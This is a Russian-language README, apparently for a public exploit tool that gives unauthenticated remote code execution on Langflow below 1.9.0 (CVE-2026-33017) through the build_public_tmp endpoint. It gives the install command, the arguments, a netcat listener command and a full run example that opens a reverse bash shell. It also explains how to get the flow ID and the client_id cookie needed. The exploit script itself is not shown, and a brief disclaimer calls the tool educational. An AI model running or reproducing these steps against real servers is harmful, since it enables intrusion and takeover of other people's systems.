
Эксплойт неавторизованного RCE в Langflow <1.9.0 (CVE-2026-33017)
Удаленное выполнение кода для Langflow через конечную точку build_public_tmp.
Эксплуатация через конечную точку сборки публичного потока, которая выполняет обратную оболочку на целевой системе.
httpxУстановка:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : Базовый URL экземпляра Langflow (например, https://flow.example.com/)-l, --lhost : Ваш IP-адрес для получения обратной оболочки-p, --lport : Порт прослушивания для обратной оболочки-f --flow-id : ID целевого потока (обязательно – получите из /api/v1/flows/ или через интерфейс)-c --client-id : Значение cookie client_id для идентификации сессииЗапустите слушатель:
nc -nlvp 9001
Запустите эксплойт:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
В случае успеха вы получите интерактивную оболочку bash.
flow-id. Получите список всех потоков через GET /api/v1/flows или скопируйте из URL браузера.MIT – для образовательных и этических исследований в области безопасности.